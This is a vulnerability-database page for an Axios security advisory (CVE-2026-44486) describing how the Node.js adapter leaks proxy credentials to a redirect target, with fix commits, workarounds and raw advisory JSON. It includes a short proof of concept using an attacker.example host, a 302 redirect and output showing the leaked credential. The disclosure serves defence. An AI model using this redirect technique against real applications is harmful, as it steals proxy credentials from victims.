Vulnerability-Lookup

Search criteria

Vendor

Product

Assigner

Sources

Sort by

Order

Apply ordering (override relevance)

Related vulnerabilities

GHSA-J5F8-GRM9-P9FC

Vulnerability from github – Published: 2026-06-04 14:15 – Updated: 2026-06-04 14:15

Summary

Axios: Proxy-Authorization header leaks to redirect target when proxy is re-evaluated to direct connection

Details

Summary

Axios’ Node.js HTTP adapter can leak proxy credentials to a redirect target in affected versions. When a request is sent through an authenticated proxy, Axios may add a Proxy-Authorization header. If Axios then follows a redirect and the redirected request is no longer sent through that proxy, the stale Proxy-Authorization header can remain on the redirected request and be sent to the redirect target.

This affects Node.js's use of Axios with automatic redirects enabled and an authenticated proxy configuration. Browser adapters are not affected.

Impact

An attacker who controls a server that the victim application requests can redirect the request so that the attacker-controlled redirect target receives the victim’s proxy credentials.

The most relevant case is a Node.js application using an authenticated HTTP_PROXY for an initial http:// request, with redirects enabled, where the redirect target resolves to no proxy, such as an https:// URL when HTTPS_PROXY is unset.

This does not affect browser, XHR, or fetch adapter behaviour. It also does not affect requests with maxRedirects: 0.

Affected Functionality

Affected functionality is limited to the Node.js HTTP adapter in lib/adapters/http.js.

Relevant inputs and settings include:

HTTP_PROXY, HTTPS_PROXY, and NO_PROXY.
Authenticated proxy URLs such as http://user:pass@proxy.example:8080.
Automatic redirect following through follow-redirects.
Axios proxy handling in setProxy().
Redirect proxy handling through beforeRedirects.proxy.

Technical Details

In affected v1 releases, setProxy() adds Proxy-Authorization when a proxy with credentials is selected, but redirect handling calls setProxy() again without first clearing any existing proxy authorization header.

If the redirected URL resolves to no proxy, setProxy() does not add a new proxy configuration and also does not remove the old header. The redirected request can therefore carry the stale Proxy-Authorization header to the final origin.

The v1 fix in afca61a adds an isRedirect path that deletes any case variant of Proxy-Authorization before proxy settings are re-applied on redirect. The v0 backport in 2af6116 fixed the 0.x line for 0.32.0.

Proof of Concept of Attack

process.env.HTTP_PROXY = 'http://user:pass@127.0.0.1:8080';
delete process.env.HTTPS_PROXY;

await axios.get('http://attacker.example/start');

Attacker-controlled HTTP endpoint:

HTTP/1.1 302 Found
Location: https://attacker.example/final

Expected result on affected versions:

https://attacker.example/final receives:
Proxy-Authorization: Basic dXNlcjpwYXNz

Expected result on fixed versions:

https://attacker.example/final receives no Proxy-Authorization header

Workarounds

Set maxRedirects: 0 and handle redirects manually.

Avoid using authenticated proxy environment variables for requests to untrusted HTTP origins unless redirect behaviour is controlled.

Ensure proxy environment variables are configured consistently across protocols so redirects do not unexpectedly change from proxied to direct connections.

Original Source ### Summary Axios' Node.js HTTP adapter can leak proxy credentials to a redirect target origin. When an initial request is sent through an authenticated HTTP proxy, Axios adds a `Proxy-Authorization` header. On redirect, Axios re-evaluates proxy settings, but if the redirected request no longer uses a proxy, the stale `Proxy-Authorization` header is not cleared. As a result, the redirect target can receive the proxy credential directly. This issue affects the Node.js HTTP adapter and can be reproduced when the initial request uses `HTTP_PROXY` with authentication, redirects are enabled, and the redirected request is resolved to no proxy, such as when `HTTPS_PROXY` is unset or the redirect target is excluded by `NO_PROXY`. ### Details In the current implementation: - `setProxy()` adds `Proxy-Authorization` when a proxy with credentials is in use. - On redirects, Axios re-invokes `setProxy()` for the redirected request. - If the redirected URL re-evaluates to "no proxy", `setProxy()` does not clear the previously added `Proxy-Authorization` header. - The redirected request therefore reuses the stale header and sends it to the final origin. Relevant code locations: - `lib/adapters/http.js` - `setProxy()` adds `Proxy-Authorization` - redirect handling re-applies proxy logic through `beforeRedirects.proxy` - no cleanup is performed when the recomputed redirect request no longer uses a proxy ### PoC 1. The victim sends `GET http:///start` 2. The request goes through a local authenticated `corp proxy` 3. The attacker-controlled HTTP endpoint returns `302 Location: https:///final` 4. The redirected HTTPS request no longer uses a proxy 5. The attacker-controlled HTTPS endpoint receives the stale `Proxy-Authorization` header Observed output:

[corp-proxy] Proxy-Authorization received: Basic dXNlcjpwYXNz
[attacker-http] GET /start
[attacker-https] GET /final
[attacker-https] Proxy-Authorization received: Basic dXNlcjpwYXNz
Leak reproduced: Proxy-Authorization was sent to the attacker HTTPS origin.

This demonstrates that the proxy credential is exposed to the redirect target origin. ### Impact Exposes authenticated proxy credentials to an attacker-controlled origin.

Severity

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "axios"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "1.16.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.31.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "axios"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.32.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44486"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-04T14:15:01Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nAxios\u2019 Node.js HTTP adapter can leak proxy credentials to a redirect target in affected versions. When a request is sent through an authenticated proxy, Axios may add a `Proxy-Authorization` header. If Axios then follows a redirect and the redirected request is no longer sent through that proxy, the stale `Proxy-Authorization` header can remain on the redirected request and be sent to the redirect target.\n\nThis affects Node.js\u0027s use of Axios with automatic redirects enabled and an authenticated proxy configuration. Browser adapters are not affected.\n\n### Impact\n\nAn attacker who controls a server that the victim application requests can redirect the request so that the attacker-controlled redirect target receives the victim\u2019s proxy credentials.\n\nThe most relevant case is a Node.js application using an authenticated `HTTP_PROXY` for an initial `http://` request, with redirects enabled, where the redirect target resolves to no proxy, such as an `https://` URL when `HTTPS_PROXY` is unset.\n\nThis does not affect browser, XHR, or fetch adapter behaviour. It also does not affect requests with `maxRedirects: 0`.\n\n### Affected Functionality\n\nAffected functionality is limited to the Node.js HTTP adapter in `lib/adapters/http.js`.\n\nRelevant inputs and settings include:\n\n- `HTTP_PROXY`, `HTTPS_PROXY`, and `NO_PROXY`.\n- Authenticated proxy URLs such as `http://user:pass@proxy.example:8080`.\n- Automatic redirect following through `follow-redirects`.\n- Axios proxy handling in `setProxy()`.\n- Redirect proxy handling through `beforeRedirects.proxy`.\n\n### Technical Details\n\nIn affected v1 releases, `setProxy()` adds `Proxy-Authorization` when a proxy with credentials is selected, but redirect handling calls `setProxy()` again without first clearing any existing proxy authorization header.\n\nIf the redirected URL resolves to no proxy, `setProxy()` does not add a new proxy configuration and also does not remove the old header. The redirected request can therefore carry the stale `Proxy-Authorization` header to the final origin.\n\nThe v1 fix in `afca61a` adds an `isRedirect` path that deletes any case variant of `Proxy-Authorization` before proxy settings are re-applied on redirect. The v0 backport in `2af6116` fixed the 0.x line for `0.32.0`.\n\n### Proof of Concept of Attack\n\n```js\nprocess.env.HTTP_PROXY = \u0027http://user:pass@127.0.0.1:8080\u0027;\ndelete process.env.HTTPS_PROXY;\n\nawait axios.get(\u0027http://attacker.example/start\u0027);\n```\n\nAttacker-controlled HTTP endpoint:\n\n```http\nHTTP/1.1 302 Found\nLocation: https://attacker.example/final\n```\n\nExpected result on affected versions:\n\n```text\nhttps://attacker.example/final receives:\nProxy-Authorization: Basic dXNlcjpwYXNz\n```\n\nExpected result on fixed versions:\n\n```text\nhttps://attacker.example/final receives no Proxy-Authorization header\n```\n\n### Workarounds\n\nSet `maxRedirects: 0` and handle redirects manually.\n\nAvoid using authenticated proxy environment variables for requests to untrusted HTTP origins unless redirect behaviour is controlled.\n\nEnsure proxy environment variables are configured consistently across protocols so redirects do not unexpectedly change from proxied to direct connections.\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal Source\u003c/summary\u003e\n\n### Summary\nAxios\u0027 Node.js HTTP adapter can leak proxy credentials to a redirect target origin. When an initial request is sent through an authenticated HTTP proxy, Axios adds a `Proxy-Authorization` header. On redirect, Axios re-evaluates proxy settings, but if the redirected request no longer uses a proxy, the stale `Proxy-Authorization` header is not cleared. As a result, the redirect target can receive the proxy credential directly.\n\nThis issue affects the Node.js HTTP adapter and can be reproduced when the initial request uses `HTTP_PROXY` with authentication, redirects are enabled, and the redirected request is resolved to no proxy, such as when `HTTPS_PROXY` is unset or the redirect target is excluded by `NO_PROXY`.\n\n### Details\nIn the current implementation:\n\n- `setProxy()` adds `Proxy-Authorization` when a proxy with credentials is in use.\n- On redirects, Axios re-invokes `setProxy()` for the redirected request.\n- If the redirected URL re-evaluates to \"no proxy\", `setProxy()` does not clear the previously added `Proxy-Authorization` header.\n- The redirected request therefore reuses the stale header and sends it to the final origin.\n\nRelevant code locations:\n\n- `lib/adapters/http.js`\n- `setProxy()` adds `Proxy-Authorization`\n- redirect handling re-applies proxy logic through `beforeRedirects.proxy`\n- no cleanup is performed when the recomputed redirect request no longer uses a proxy\n\n### PoC\n1. The victim sends `GET http://\u003cattacker-site\u003e/start`\n2. The request goes through a local authenticated `corp proxy`\n3. The attacker-controlled HTTP endpoint returns `302 Location: https://\u003cattacker-site\u003e/final`\n4. The redirected HTTPS request no longer uses a proxy\n5. The attacker-controlled HTTPS endpoint receives the stale `Proxy-Authorization` header\n\nObserved output:\n\n```text\n[corp-proxy] Proxy-Authorization received: Basic dXNlcjpwYXNz\n[attacker-http] GET /start\n[attacker-https] GET /final\n[attacker-https] Proxy-Authorization received: Basic dXNlcjpwYXNz\nLeak reproduced: Proxy-Authorization was sent to the attacker HTTPS origin.\n```\n\nThis demonstrates that the proxy credential is exposed to the redirect target origin.\n\n### Impact\nExposes authenticated proxy credentials to an attacker-controlled origin.\n\u003c/details\u003e\n\n---",
  "id": "GHSA-j5f8-grm9-p9fc",
  "modified": "2026-06-04T14:15:01Z",
  "published": "2026-06-04T14:15:01Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/security/advisories/GHSA-j5f8-grm9-p9fc"
    },
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/pull/10794"
    },
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/commit/afca61a070728e717203c2bc21e7b589b59b858b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/axios/axios"
    },
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/releases/tag/v0.32.0"
    },
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/releases/tag/v1.16.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Axios: Proxy-Authorization header leaks to redirect target when proxy is re-evaluated to direct connection"
}